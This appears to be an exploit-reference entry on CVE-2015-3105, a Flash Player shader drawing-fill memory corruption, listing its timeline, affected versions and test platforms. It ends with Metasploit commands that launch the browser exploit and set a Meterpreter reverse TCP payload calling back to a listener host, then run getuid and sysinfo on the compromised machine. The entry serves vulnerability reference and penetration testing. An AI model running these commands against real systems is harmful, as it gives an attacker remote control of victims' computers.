CVE-2015-3105 Adobe Flash Player Drawing Fill Shader Memory Corruption

Timeline :

Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 the 2015-06-09
Vulnerability discovered exploited in the Exploit Kits the 2015-06-16
Metasploit PoC provided the 2015-06-25

PoC provided by :

Chris Evans
Unknown
juan vazquez

Reference(s) :

CVE-2015-3105
APSB15-11

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested on :

Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188

Description :

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Commands :

use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo